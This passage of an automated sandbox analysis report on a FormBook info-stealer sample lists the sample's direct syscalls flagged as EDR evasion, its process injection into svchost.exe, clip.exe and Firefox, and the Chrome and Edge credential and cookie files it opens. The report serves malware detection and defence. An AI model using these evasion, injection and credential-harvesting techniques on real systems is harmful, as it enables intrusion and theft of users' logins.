            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6CA38 mov eax, dword ptr fs:[00000030h]2_2_03B6CA38
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6CA24 mov eax, dword ptr fs:[00000030h]2_2_03B6CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5EA2E mov eax, dword ptr fs:[00000030h]2_2_03B5EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBCA11 mov eax, dword ptr fs:[00000030h]2_2_03BBCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BACA72 mov eax, dword ptr fs:[00000030h]2_2_03BACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BACA72 mov eax, dword ptr fs:[00000030h]2_2_03BACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6CA6F mov eax, dword ptr fs:[00000030h]2_2_03B6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6CA6F mov eax, dword ptr fs:[00000030h]2_2_03B6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6CA6F mov eax, dword ptr fs:[00000030h]2_2_03B6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDEA60 mov eax, dword ptr fs:[00000030h]2_2_03BDEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]2_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]2_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]2_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]2_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]2_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]2_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]2_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40A5B mov eax, dword ptr fs:[00000030h]2_2_03B40A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40A5B mov eax, dword ptr fs:[00000030h]2_2_03B40A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB89B3 mov esi, dword ptr fs:[00000030h]2_2_03BB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB89B3 mov eax, dword ptr fs:[00000030h]2_2_03BB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB89B3 mov eax, dword ptr fs:[00000030h]2_2_03BB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B309AD mov eax, dword ptr fs:[00000030h]2_2_03B309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B309AD mov eax, dword ptr fs:[00000030h]2_2_03B309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B629F9 mov eax, dword ptr fs:[00000030h]2_2_03B629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B629F9 mov eax, dword ptr fs:[00000030h]2_2_03B629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBE9E0 mov eax, dword ptr fs:[00000030h]2_2_03BBE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03B3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03B3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03B3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03B3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03B3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03B3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B649D0 mov eax, dword ptr fs:[00000030h]2_2_03B649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFA9D3 mov eax, dword ptr fs:[00000030h]2_2_03BFA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC69C0 mov eax, dword ptr fs:[00000030h]2_2_03BC69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04940 mov eax, dword ptr fs:[00000030h]2_2_03C04940
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB892A mov eax, dword ptr fs:[00000030h]2_2_03BB892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC892B mov eax, dword ptr fs:[00000030h]2_2_03BC892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBC912 mov eax, dword ptr fs:[00000030h]2_2_03BBC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B28918 mov eax, dword ptr fs:[00000030h]2_2_03B28918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B28918 mov eax, dword ptr fs:[00000030h]2_2_03B28918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE908 mov eax, dword ptr fs:[00000030h]2_2_03BAE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE908 mov eax, dword ptr fs:[00000030h]2_2_03BAE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD4978 mov eax, dword ptr fs:[00000030h]2_2_03BD4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD4978 mov eax, dword ptr fs:[00000030h]2_2_03BD4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBC97C mov eax, dword ptr fs:[00000030h]2_2_03BBC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B56962 mov eax, dword ptr fs:[00000030h]2_2_03B56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B56962 mov eax, dword ptr fs:[00000030h]2_2_03B56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B56962 mov eax, dword ptr fs:[00000030h]2_2_03B56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B7096E mov eax, dword ptr fs:[00000030h]2_2_03B7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B7096E mov edx, dword ptr fs:[00000030h]2_2_03B7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B7096E mov eax, dword ptr fs:[00000030h]2_2_03B7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB0946 mov eax, dword ptr fs:[00000030h]2_2_03BB0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C008C0 mov eax, dword ptr fs:[00000030h]2_2_03C008C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBC89D mov eax, dword ptr fs:[00000030h]2_2_03BBC89D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30887 mov eax, dword ptr fs:[00000030h]2_2_03B30887
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C8F9 mov eax, dword ptr fs:[00000030h]2_2_03B6C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C8F9 mov eax, dword ptr fs:[00000030h]2_2_03B6C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFA8E4 mov eax, dword ptr fs:[00000030h]2_2_03BFA8E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E8C0 mov eax, dword ptr fs:[00000030h]2_2_03B5E8C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B52835 mov eax, dword ptr fs:[00000030h]2_2_03B52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B52835 mov eax, dword ptr fs:[00000030h]2_2_03B52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B52835 mov eax, dword ptr fs:[00000030h]2_2_03B52835
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_00A20B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00A20B62
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_009F2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_009F2622
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_009E083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_009E083F
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_009E09D5 SetUnhandledExceptionFilter,0_2_009E09D5
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_009E0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_009E0C21

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exeNtCreateMutant: Direct from: 0x774635CCJump to behavior
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exeNtWriteVirtualMemory: Direct from: 0x77462E3CJump to behavior
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exeNtMapViewOfSection: Direct from: 0x77462D1CJump to behavior
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exeNtResumeThread: Direct from: 0x774636ACJump to behavior
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exeNtProtectVirtualMemory: Direct from: 0x77462F9CJump to behavior
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exeNtSetInformationProcess: Direct from: 0x77462C5CJump to behavior
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exeNtSetInformationThread: Direct from: 0x774563F9Jump to behavior
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exeNtClose: Direct from: 0x77457B2E
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exeNtNotifyChangeKey: Direct from: 0x77463C2CJump to behavior
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exeNtAllocateVirtualMemory: Direct from: 0x77462BFCJump to behavior
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exeNtQueryInformationProcess: Direct from: 0x77462C26Jump to behavior
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exeNtResumeThread: Direct from: 0x77462FBCJump to behavior
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exeNtReadFile: Direct from: 0x77462ADCJump to behavior
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exeNtQuerySystemInformation: Direct from: 0x77462DFCJump to behavior
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exeNtDelayExecution: Direct from: 0x77462DDCJump to behavior
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exeNtAllocateVirtualMemory: Direct from: 0x77463C9CJump to behavior
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exeNtClose: Direct from: 0x77462B6C
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exeNtCreateUserProcess: Direct from: 0x7746371CJump to behavior
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exeNtWriteVirtualMemory: Direct from: 0x7746490CJump to behavior
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exeNtAllocateVirtualMemory: Direct from: 0x774648ECJump to behavior
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exeNtQuerySystemInformation: Direct from: 0x774648CCJump to behavior
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exeNtQueryVolumeInformationFile: Direct from: 0x77462F2CJump to behavior
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exeNtReadVirtualMemory: Direct from: 0x77462E8CJump to behavior
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exeNtCreateKey: Direct from: 0x77462C6CJump to behavior
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exeNtSetInformationThread: Direct from: 0x77462B4CJump to behavior
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exeNtQueryAttributesFile: Direct from: 0x77462E6CJump to behavior
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exeNtDeviceIoControlFile: Direct from: 0x77462AECJump to behavior
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exeNtOpenSection: Direct from: 0x77462E0CJump to behavior
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exeNtCreateFile: Direct from: 0x77462FECJump to behavior
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exeNtOpenFile: Direct from: 0x77462DCCJump to behavior
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exeNtQueryInformationToken: Direct from: 0x77462CACJump to behavior
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exeNtTerminateThread: Direct from: 0x77462FCCJump to behavior
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exeNtAllocateVirtualMemory: Direct from: 0x77462BECJump to behavior
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exeNtOpenKeyEx: Direct from: 0x77462B9CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\clip.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: NULL target: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: NULL target: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\clip.exeThread register set: target process: 4524Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\clip.exeThread APC queued: target process: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3080008Jump to behavior
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_00A21201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00A21201
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_00A02BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00A02BA5
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_00A2B226 SendInput,keybd_event,0_2_00A2B226
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_00A422DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_00A422DA
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\plZuPtZoTk.exe"Jump to behavior
            Source: C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exeProcess created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_00A20B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00A20B62
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_00A21663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00A21663
            Source: plZuPtZoTk.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: plZuPtZoTk.exe, GtDTOqzvEb.exe, 00000004.00000000.1829744795.0000000001691000.00000002.00000001.00040000.00000000.sdmp, GtDTOqzvEb.exe, 00000004.00000002.3282227189.0000000001691000.00000002.00000001.00040000.00000000.sdmp, GtDTOqzvEb.exe, 00000008.00000002.3283150825.0000000000CA1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: GtDTOqzvEb.exe, 00000004.00000000.1829744795.0000000001691000.00000002.00000001.00040000.00000000.sdmp, GtDTOqzvEb.exe, 00000004.00000002.3282227189.0000000001691000.00000002.00000001.00040000.00000000.sdmp, GtDTOqzvEb.exe, 00000008.00000002.3283150825.0000000000CA1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: GtDTOqzvEb.exe, 00000004.00000000.1829744795.0000000001691000.00000002.00000001.00040000.00000000.sdmp, GtDTOqzvEb.exe, 00000004.00000002.3282227189.0000000001691000.00000002.00000001.00040000.00000000.sdmp, GtDTOqzvEb.exe, 00000008.00000002.3283150825.0000000000CA1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: 0Program Manager
            Source: GtDTOqzvEb.exe, 00000004.00000000.1829744795.0000000001691000.00000002.00000001.00040000.00000000.sdmp, GtDTOqzvEb.exe, 00000004.00000002.3282227189.0000000001691000.00000002.00000001.00040000.00000000.sdmp, GtDTOqzvEb.exe, 00000008.00000002.3283150825.0000000000CA1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_009E0698 cpuid 0_2_009E0698
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_00A38195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_00A38195
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_00A1D27A GetUserNameW,0_2_00A1D27A
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_009FB952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_009FB952
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_009C42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_009C42DE

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.3281124203.0000000000330000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1911723289.0000000003960000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1911428216.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3285172725.0000000004A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3283463490.0000000004280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3283258223.00000000008F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1912223834.0000000006000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3282844800.0000000004B70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
